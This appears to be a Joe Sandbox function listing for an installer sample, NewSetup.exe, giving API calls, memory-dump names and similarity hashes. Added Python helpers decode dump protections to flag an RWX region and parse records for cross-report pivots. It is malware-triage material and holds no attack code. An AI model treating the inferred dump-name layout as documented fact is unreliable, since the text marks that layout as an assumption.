                                                                                                      • Opcode Fuzzy Hash: 22d83ffd62bbe1ca32624d7355a896f4529d6008a9a13cdc84af89d3f5fa50e8
                                                                                                      • Instruction Fuzzy Hash: 7051ECB0921208DFCB00DF94E848BEEBBB5FF48320F144129E8196B391D776A965CF91
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213EC6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214002
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021ABE5
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021AC09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: bad locale name$|=!e.$
                                                                                                      • API String ID: 2070049627-25103358
                                                                                                      • Opcode ID: 72403a7a91ee5ac74369439d856927e22a0dff61f77f4c33fb6de762ba128c25
                                                                                                      • Instruction ID: ebf30bae878db9478cae3f061f85f193581c308e6c1268190f1e127cb4ff703d
                                                                                                      • Opcode Fuzzy Hash: 72403a7a91ee5ac74369439d856927e22a0dff61f77f4c33fb6de762ba128c25
                                                                                                      • Instruction Fuzzy Hash: 7E41AFF0A10745ABEB10DF69D805B57BBF8BF14714F044229E40997B80E37AE568CBE1
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021B809
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction ID: 660da78c084d33d138a3466321075fa54a4abce0f258bb6422d296b71977f096
                                                                                                      • Opcode Fuzzy Hash: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction Fuzzy Hash: FD21D6369202069FCF269F54D495AF9B7FCEF60720F15455EE401876D0D734ADE1CA80
                                                                                                      APIs
                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                      • String ID: :%!
                                                                                                      • API String ID: 2551024706-1915189741
                                                                                                      • Opcode ID: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction ID: e2d135945a100e18932bc2f42e89c46316e32a59ffc80aea00b2d6fb74fcefc6
                                                                                                      • Opcode Fuzzy Hash: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction Fuzzy Hash: B1F05E71654115FFDB108F24DD0DA9A3AA4EB12770F240720F835EA1E0E771DE908680
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarn
                                                                                                      • String ID: e.$$|=!e.$
                                                                                                      • API String ID: 1767336200-2625508016
                                                                                                      • Opcode ID: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction ID: 823995cb09c1e9c1722c51f467b18873b233a5def4e415e66f5dc0e170e1bc7e
                                                                                                      • Opcode Fuzzy Hash: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction Fuzzy Hash: A1E06D223283107FEB0CBA66EC52BBA73DCCB14B60F10002EF90A8A5C1ED10BD944A95
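                                                                                                      The Memory Dump Source lines in each block above name every dumped region by its base address and a page-protection value; among the dumps listed for this process, the region at 0x24A000 is the only one carrying 0x40, which is PAGE_EXECUTE_READWRITE. The following is an added example, not Joe Sandbox's own code: a small parser that decodes those .sdmp names into the Win32 PAGE_* and MEM_* constants from winnt.h and flags any region that is both writable and executable. The field order it assumes for the name (base address in the fourth field, page protection in the fifth, region type in the seventh) is inferred from the names on this page, not from a documented format, and is labelled as such in the code.

```python
import re
from dataclasses import dataclass
from typing import List

# Win32 memory-protection and region-type constants from winnt.h.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# ASSUMED layout of a Joe Sandbox .sdmp name, inferred from the names in this
# report (eight dot-separated fields):
#   <process index>.<dump kind>.<dump id>.<base address>.<page protection>.
#   <unnamed>.<region type>.<sequence>.sdmp
# Only the base-address, protection and region-type fields are relied on.
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<seq>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        # Low byte is the base protection; higher bits are modifiers (GUARD etc.).
        base_prot = self.protect & 0xFF
        parts = [PAGE_PROTECTIONS.get(base_prot, f"UNKNOWN_0x{base_prot:02X}")]
        parts += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(parts)

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"UNKNOWN_0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE

    @property
    def rwx(self) -> bool:
        return self.executable and self.writable


def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name; raises ValueError on anything else."""
    m = _SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(name=name, base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mem_type=int(m["mtype"], 16))


def find_rwx_regions(names: List[str]) -> List[int]:
    """Base addresses of regions that are both writable and executable."""
    return sorted(r.base for r in map(parse_sdmp_name, names) if r.rwx)


def region_table(names: List[str]) -> List[str]:
    """One line per region, ordered by base address, RWX regions marked."""
    rows = sorted(map(parse_sdmp_name, names), key=lambda r: r.base)
    return [f"{r.base:#010x}  {r.protection_name:<24} {r.type_name:<12}"
            f"{' <-- RWX' if r.rwx else ''}" for r in rows]


# The dump names listed in the blocks above for process 0 of this analysis.
SAMPLE_DUMPS = [
    "00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    print("\n".join(region_table(SAMPLE_DUMPS)))
```

                                                                                                      An RWX region inside an image mapping is the usual place to look for code that was unpacked or patched in place, so the 0x24A000 dump is the one to open first when comparing the in-memory code against the on-disk NewSetup.exe.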
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C), ref: 0023694D
                                                                                                      • GetLastError.KERNEL32(?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C,00000000,?,0022BBBC), ref: 00236957
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0023697F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                      • Opcode ID: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction ID: 6a9e1b5a4484faa21fb449248e11a8719031191cbb7d990c358602d5bb14f7f0
                                                                                                      • Opcode Fuzzy Hash: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction Fuzzy Hash: 71E01AB07A0205BAEF201F61EC4EB6C3A59AB52B91F144420F94DA88E0DB71EC649945
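Every entry in this listing has the same shape: an APIs section (call sites with a "Part of subcall function" prefix for callees reached indirectly), a Memory Dump Source section, the IDA snapshot file and a Similarity section whose fields (API ID, API String ID, Opcode ID, Instruction Fuzzy Hash) are the values an analyst pivots on across reports. The parser below is an added example, not Joe Sandbox's own code; the record layout is inferred from the listing, and the sample input is constructed from two of the records above with their argument lists shortened, including the "Download File" link text the HTML export glues onto Associated lines so the parser can show stripping it.

```python
"""Parse the per-function records of a Joe Sandbox function listing so the
Similarity fields can be used as pivot keys.  Added example, not Joe Sandbox
code; record layout inferred from the listing, sample input constructed."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR: "
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[^\s(.]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str            # address of the call site
    parent: str | None  # parent function address for "Part of subcall" lines, else None


@dataclass
class Record:
    apis: list[ApiCall] = field(default_factory=list)
    dump: dict[str, list[str]] = field(default_factory=dict)  # Source File / Associated
    similarity: dict[str, str] = field(default_factory=dict)  # API ID, Opcode ID, hashes
    snapshot: str | None = None


def parse_records(text: str) -> list[Record]:
    """Walk the listing line by line; a record closes at its Instruction Fuzzy Hash line."""
    records, cur, section = [], Record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        kv = KV_RE.match(line)
        # the HTML export appends a "Download File" link to Associated lines; drop it
        value = kv.group("value").removesuffix("Download File").strip() if kv else ""
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref"), m.group("parent")))
        elif section == "Memory Dump Source" and kv:
            cur.dump.setdefault(kv.group("key"), []).append(value)
        elif section == "Joe Sandbox IDA Plugin" and kv:
            cur.snapshot = value
        elif section == "Similarity" and kv:
            cur.similarity[kv.group("key")] = value
            if kv.group("key") == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = Record(), None
    if cur.apis or cur.similarity:  # keep a trailing record cut off by extraction
        records.append(cur)
    return records


def index_by(records: list[Record], key: str) -> dict[str, list[Record]]:
    """Group records by one Similarity field (e.g. "API String ID") for cross-report pivots."""
    idx = defaultdict(list)
    for r in records:
        if r.similarity.get(key):
            idx[r.similarity[key]].append(r)
    return dict(idx)


def calls(records: list[Record], api_name: str) -> list[Record]:
    """Records whose own body (not a subcall) calls api_name."""
    return [r for r in records
            if any(a.name == api_name and a.parent is None for a in r.apis)]


# Constructed sample: two records from this report, argument lists shortened.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002369DC), ref: 0023694D
• GetLastError.KERNEL32(?,002369DC,00000000), ref: 00236957
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0023697F
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
• Instruction Fuzzy Hash: 71E01AB07A0205BAEF201F61EC4EB6C3A59AB52B91F144420F94DA88E0DB71EC649945
APIs
• GetConsoleOutputCP.KERNEL32(456001D6,00000000,00000000,?), ref: 00234001
  • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000), ref: 0022C082
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00234253
• GetLastError.KERNEL32 ref: 0023433C
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Instruction Fuzzy Hash: 51D198B5E102589FCF14DFE8D884AEDBBB4FF09314F2841AAE856EB351D630A951CB50
"""
```

When pivoting, filter out records that are plainly compiler runtime: the LoadLibraryExW record above is the C runtime's loader shim (0x800 is LOAD_LIBRARY_SEARCH_SYSTEM32, with a retry on flags 0 and the "api-ms-" prefix check), and entries such as std::_Lockit, __dosmaperr and __EH_prolog3 are library code shared by any MSVC binary, so their fuzzy hashes will match unrelated samples.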
APIs
• GetConsoleOutputCP.KERNEL32(456001D6,00000000,00000000,?), ref: 00234001
  • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00234253
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00234299
• GetLastError.KERNEL32 ref: 0023433C
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
• Instruction ID: cf4cfc4086c25db6081b938e6d7dfa85e89ba01ebc346c445ed138fe4616d60c
• Opcode Fuzzy Hash: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
• Instruction Fuzzy Hash: 51D198B5E102589FCF14DFE8D884AEDBBB4FF09314F2841AAE856EB351D630A951CB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: f939811fdab27e74b137b6e27c7bba1a58b543b2e635ce940272215f0e3bdb2e
• Instruction ID: 034b16a4f13fa947d55aff8dcd24da90a7d3d2e20afae49f63686827a2a3e9a8
• Opcode Fuzzy Hash: f939811fdab27e74b137b6e27c7bba1a58b543b2e635ce940272215f0e3bdb2e
• Instruction Fuzzy Hash: 4F51D471A24622FFDB26DFD0E891BAA73A4EF04710F14456DEC0657291D771ECA0CB90
APIs
• GetCurrentThreadId.KERNEL32 ref: 002172C5
• std::_Throw_Cpp_error.LIBCPMT ref: 00217395
• std::_Throw_Cpp_error.LIBCPMT ref: 002173A3
• std::_Throw_Cpp_error.LIBCPMT ref: 002173B1
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
• Opcode ID: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
• Instruction ID: 53f3afac642ca10e6f550c36a43b782421919c164c98c5a4c32175135559ee24
• Opcode Fuzzy Hash: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
• Instruction Fuzzy Hash: 4141F5B19143068BDB21DF24C845BEFB7F4BFA4320F144679D82647691EB34E8A5CB91
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00214495
• std::_Lockit::_Lockit.LIBCPMT ref: 002144B2
• std::_Lockit::~_Lockit.LIBCPMT ref: 002144D3
• std::_Lockit::~_Lockit.LIBCPMT ref: 00214580
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
• Instruction ID: e6ab17f6e347e09cf7fdc4472a1e28c73b8c9433c6b3dd0c75654b8eab4e6da3
• Opcode Fuzzy Hash: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
• Instruction Fuzzy Hash: CF418875D112198FCB10EF98E848BEDBBF5FB69320F544229E80967391D734A990CFA1
APIs
  • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
• GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E2A
• __dosmaperr.LIBCMT ref: 00231E31
• GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E6B
• __dosmaperr.LIBCMT ref: 00231E72
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: dce0d32cee6f2a16a3bbcd92a7e6778ff7abfb4d6d70a4696a587330dba316fe
• Instruction ID: 7da396cc7891a934dd7dd2fca6d96b71e0c405be5a711f71efc3f522c5382952
• Opcode Fuzzy Hash: dce0d32cee6f2a16a3bbcd92a7e6778ff7abfb4d6d70a4696a587330dba316fe
• Instruction Fuzzy Hash: DC21B0B1624226BFDB20AFA5DC8596BB7A9FF05364F108519FC1997111D732EC308BA0
Memory Dump Source
• Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID:
• String ID:
